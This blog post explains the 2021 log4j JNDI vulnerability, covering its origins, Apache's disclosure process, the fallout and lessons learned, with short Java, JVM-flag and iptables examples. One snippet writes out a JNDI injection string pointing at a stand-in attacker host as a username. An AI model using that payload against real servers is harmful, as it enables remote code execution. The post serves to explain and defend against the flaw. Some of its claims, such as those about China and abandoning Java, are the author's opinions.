By the time you read this, you’ll already know a few things about the whole log4j vulnerability, but you may not have realized how fragile cybersecurity for real-life services really is. I think it’s time we have a look.

Background

Before we look at what this vulnerability means, and to save you from having to dig around the Internet for the details, let’s have a quick look at what the vulnerability actually is.

Timeline

The vulnerability was introduced back in August 2013 (as far as I can tell from the Git history), when log4j gained a feature that uses Java’s JNDI to substitute certain values in log messages. Note that date; we’ll get back to it later.

JNDI is a standard feature of Java that was introduced in 1997 and allows the Java Virtual Machine (JVM) to download and run code, patching it in from a third party. This allows for amazing flexibility: you can write an application that simply calls into a shared interface, but downloads the implementation of that interface from somewhere else. You don’t have to worry about how you get the chunk of information you need, because someone else is already doing that for you. Cool, right? Well, 1997 is before REST was invented. At the time, downloading and running foreign code was not frowned upon, and cybersecurity was less of a concern in the minds of the people writing code. Today, and actually from shortly after 1997 onward, this would not be considered a good idea. I’ll admit it’s convenient though.
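To make that concrete, here is a minimal sketch of what a JNDI lookup looks like. The LDAP URL is hypothetical; the point is that on a permissively configured JVM, a lookup like this can end up fetching and instantiating a class supplied by the remote server.

```java
import javax.naming.Context;
import javax.naming.InitialContext;

public class JndiLookupDemo {
    public static void main(String[] args) throws Exception {
        // Ask JNDI to resolve a name. With an LDAP URL and a permissive
        // JVM configuration, the directory server can answer with a
        // reference to a remote class, which the JVM then loads and runs.
        Context ctx = new InitialContext();
        Object impl = ctx.lookup("ldap://directory.example.com/cn=coffeeMaker");
        // 'impl' is now whatever the remote server decided to hand us.
        System.out.println(impl.getClass().getName());
    }
}
```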

Convenience over security

The real issue is that JNDI assumes a trust model that doesn’t hold up: generally, you would not want any code, whether you’ve written it yourself or not, to have access to any resources it does not need. If you need to run some chunk of code that is hosted elsewhere, you shouldn’t download that code and run it locally, precisely because that chunk of code will then have access to everything you have access to, and you will need access to whatever it needs in order to run.

Let me clarify this: if I ask you to make me a cup of coffee, and I’ll give you money for that coffee, I need access to my money and you need access to your coffee machine and supplies. If I download the “make coffee” code via mind meld, and then execute it, I still have access to my money, but now so does the “make coffee” function I downloaded from your brain, and I also need access to your coffee machine and supplies. If your “make coffee” function takes an extra twenty-dollar bill as part of making coffee, I’ll still get my coffee, but I’m out an extra twenty! If my code running your “make coffee” routine takes some extra supplies, you have no way to stop me either! I’m not saying this is why mind melds are a bad idea, but it is why JNDI is a bad idea: it assumes a trust model that is not secure by default.

So, JNDI is a basic feature of Java and assumes a trust model that is not secure by default. That sounds like a basic flaw in Java rather than a vulnerability in log4j, and it’s been there since 1997. Surely Sun or Oracle has created a fix for this since then? Well, yes, you can turn it off, but it’s not that easy: configuration in Java is basically broken and definitely overly complicated. You can configure your JVM to allow or disallow certain things, but the default configuration is not secure, and any non-trivial application has hundreds of settings to comb through. Finding and understanding the documentation for all of them before deploying on a deadline is a recipe for failure. Again, secure by default was not a thing in 1997, and the whole strength of Java is that it never breaks backward compatibility, so if you want to secure a Java application you’re going to have to do it yourself.
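To give a sense of what “doing it yourself” involves, here is a minimal sketch of hardening a JVM against remote JNDI code loading at launch time. The jar name is a placeholder; the two system properties are real, though their defaults depend on your Java version (recent JVMs already default them to false).

```sh
# Hypothetical launch script: forbid the JVM from loading classes
# referenced by LDAP or RMI directory entries.
java \
  -Dcom.sun.jndi.ldap.object.trustURLCodebase=false \
  -Dcom.sun.jndi.rmi.object.trustURLCodebase=false \
  -jar my-service.jar   # placeholder for your actual application
```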

Still not a log4j issue though.

So, Java had had this feature for 16 years when its use was introduced as a feature in log4j in 2013. There would have been a secure way to do this: just don’t allow user input to trigger JNDI queries. If you want to use JNDI for anything, get it from the configuration and have the logging framework itself do it, but don’t rely on user input. That was the intent, but that is not what was implemented.

You can get really cool features by allowing user input into a query. For example, if I want to log logins, logouts, and login failures, I’d want to know who logged in, right? So I’d want to take the username entered by the user, and log it, right? Sure! But I’d also want to know that, for example, the username “HumongousPotato” actually corresponds to a user called “John Doe”, so I’d want to look up the username in my LDAP server, get their common name from that LDAP server, and use that. Easy peasy, just have the logging apparatus do it, right?
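Here is a minimal sketch of how that goes wrong in practice. The class, the handler, and the attacker.example domain are all made up for illustration; the mechanism is real for log4j versions with message lookups enabled (roughly 2.0-beta9 through 2.14.1).

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginAudit {
    private static final Logger LOG = LogManager.getLogger(LoginAudit.class);

    // Hypothetical handler: 'username' comes straight from the login form.
    static void recordLogin(String username) {
        // On vulnerable versions, log4j scans the *formatted* message for
        // ${...} lookups, so user input that contains one gets evaluated:
        // a username of "${jndi:ldap://attacker.example/a}" makes the
        // logger itself connect out and load whatever that server serves.
        LOG.info("Login succeeded for user {}", username);
    }

    public static void main(String[] args) {
        recordLogin("HumongousPotato");                    // harmless
        recordLogin("${jndi:ldap://attacker.example/a}");  // not harmless
    }
}
```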

That was basically the intent: convenience. Java is all about convenience with its thousands of libraries and APIs that seem to never break as new features get added. It’s all about productivity, reducing time to market, getting stuff “out there”.

This whole issue was born from a “convenience over security” mindset. Nothing malicious about it. Nothing overly lazy either: productivity and convenience are Good Things. The “write once, run anywhere” mantra is a mantra of convenience, and it works! Java code is routinely well-tested, good-quality code that just works out of the box, all the time, but the price for that convenience is security.

Now, I’m not just saying this for the heck of it: the Struts vulnerability that caused the Equifax breach back in 2017 is in the same category of convenience over security, allowing code execution from a well-chosen malicious HTTP header.

Apache

In the world of Java components, you’ll often see a name pop up: “Apache”. When you say “Apache” to a Linux admin, especially one who’s been around for a while, they’ll think of the Apache HTTP web server which, before nginx came around, was the de facto web server for Linux. It’s the ‘A’ in “LAMP”, after all. If you don’t know what that means, it’s fine.

But for Java developers, the name “Apache” is attached to a number of very useful frameworks and libraries, ranging from the Xerces XML parser, which was already the de facto standard XML parser in both Java and C++ two decades ago and is still going strong, through Apache Struts, a framework for Java web applications, to Apache log4j, a logging library.

Apache proudly announces itself as “the world’s largest open source foundation”, and they’re right: they’re much larger than the Free Software Foundation and have a well-defined open development process based on the ideals of meritocracy. They provide the logistical backbone of a large part of the open source community and lend their name to dozens of projects.

What they are not, is a business. People who work on projects that carry the Apache name are unpaid volunteers, not employees. They don’t have a group of employees with a strong background in cybersecurity to provide guidelines and training to developers, and they don’t have an infrastructure to allow project teams to automate cybersecurity checks and workflows into their CI/CD pipelines. When you see, in a news article somewhere, that “Apache has released a fix for the log4j vulnerability” or that “The Apache team is working on a fix”, whoever wrote that is thinking of Apache as a business, which it is not.

Let me be clear: Apache did nothing wrong here. They enable good-quality open source projects by providing structure and some logistics, but the Apache Software Foundation is not responsible for the contents of those projects: the project’s Project Management Committee is.

Responsible disclosure

Apache has a security team and a vulnerability management policy that is in line with its philosophy of transparency and good governance: when you think you’ve found a problem, you send a message to security (at) project (dot) apache (dot) org and follow the process described.

As far as I can tell, this process was followed, a fix was made available to the community, and the CVE was then published. The problem was that this last step was done too quickly.

Transparency and openness are fine: they are what open source is all about. However, when you have a popular logging framework, and logging is something that everyone is encouraged to do all the time (among other things for cybersecurity purposes), then just publishing a fix and publishing the CVE a day later is not a good plan.

Again, Apache is not a business. If it were, it would have been expected to have a list of its users and to privately notify them of the importance of upgrading to a version with the fix, before releasing the details about the fix to the public. This is tricky: if everything is done out in the open, and you announce a new version that fixes a vulnerability without telling everyone what the vulnerability is, a malicious actor can still go look at the code and figure it out. The commit messages and the code changes will make it clear what the issue is. On the other hand, keeping things under wraps is not a good idea either, and there is no delay between the binary version of the library being released and the source code being released, as there would be with a closed-source project.

In short, responsible disclosure becomes extremely difficult when you’re dealing with a popular open source project that cannot (and arguably should not) track its users and communicate with them privately, and that cannot keep problems under wraps for the time its users need to upgrade to a version with a fix.

Again, frustrating as it may be, Apache, the project, and its volunteers did nothing wrong: they were in a situation that could hardly have been worse, and they handled it as well as they could.

“But what about Alibaba? They were under fire for their way of disclosing the vulnerability, right?” Well, yes, but by the Chinese government. The Chinese government wanted Alibaba to disclose the vulnerability to them first, before disclosing it to the project team. The only legitimate reason I can see why they’d want that would be to protect their own assets that use log4j, but let’s not be naive: China is in a cyber-war with western nations and would probably have exploited the issue if they had known about it.

Fall-out

Between December 10 and December 13, when the CVE was published and people started becoming aware of it, thousands of websites and web-based services were “preventatively” shut down as IT teams worked through the weekend to find out which versions of log4j they had deployed, and how to patch the vulnerability in their code.

This turned out to be an iterative process as most applications don’t use the latest versions of third-party libraries, and log4j is not necessarily a direct dependency of the applications that use it (i.e. they may use a component that (uses a component that …) uses log4j).
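For teams on Maven builds, that hunt through nested dependencies looked something like the sketch below; the coordinates are log4j’s real ones, and Gradle has an equivalent in its dependencyInsight report.

```sh
# List every dependency path that drags in log4j-core, including
# transitive ones buried several components deep.
mvn dependency:tree -Dincludes=org.apache.logging.log4j:log4j-core
```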

Add to that that the initial fix was not a complete fix of the issue, that just reading about the issue in the CVE listing isn’t all that informative, and that deploying an updated web application to production usually requires at least some testing, and those IT teams had a lot on their hands.

The FBI has set up a service to report exploits for the vulnerability, but as far as I can tell the RCMP has not.

In the meantime, several exploits were published on Twitter, GitHub, and various other places. Anyone with a web browser (that is: anyone at all) could set up an exploit for this vulnerability in minutes and use it against any vulnerable server.

That is not the problem, though.

The problem is that someone who exploits the vulnerability and is smart about it won’t stop there: they’ll use that ability to run arbitrary code on a target server to install a worm on that server, create a back door, and “go dark”. If they do that on a wide array of targets, some of those worms will survive and be usable as back doors later.

Lessons learned

Security before convenience: Java is a nice programming language, but the philosophy behind the language and its support, never breaking anything with updates, is broken. This will happen again and again, until the JVM ships with a configuration that shuts down, by default, anything that could possibly be exploited. “Anything that could possibly be exploited” includes the majority of Java language features, so it’s probably better to give up on Java for public-facing interfaces (UI and API).

Responsible disclosure is incompatible with completely open development: when you’re doing everything in public, it’s hard to keep a secret. That does not mean open source software should stop being open source, but it does mean there should be a reasonable window (say, three to six months) before security-related code becomes public. That won’t work all the time, and it’s neither a complete nor a universal solution, but it’s something to think about.

Eight years is a long time: what are the chances of no-one having found and exploited this bug in eight years? Would we know about it if anyone had? Do all governments and large corporations have active intrusion detection mechanisms that detect outgoing connections to unknown servers (which would have caught an exploit in this case)? Is the threat model clear?
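To make the “outgoing connections” question concrete, here is a minimal egress-filtering sketch with iptables, assuming a server that should only ever initiate connections to internal hosts; the 10.0.0.0/8 range stands in for whatever your real allow list would be.

```sh
# Allow established traffic and connections to known-good hosts,
# then log and drop any other new connection leaving the server.
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -d 10.0.0.0/8 -j ACCEPT          # placeholder allow list
iptables -A OUTPUT -m state --state NEW -j LOG --log-prefix "EGRESS: "
iptables -A OUTPUT -m state --state NEW -j DROP
```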

Use VMs to mitigate: once an exploit has been released to the wild, you don’t know if the server you’ve been running your application on is still OK. Scrap it. Replace it with a VM that you can scrap more easily. Make sure it’s in a sandbox that’s hard to get out of. Security over convenience.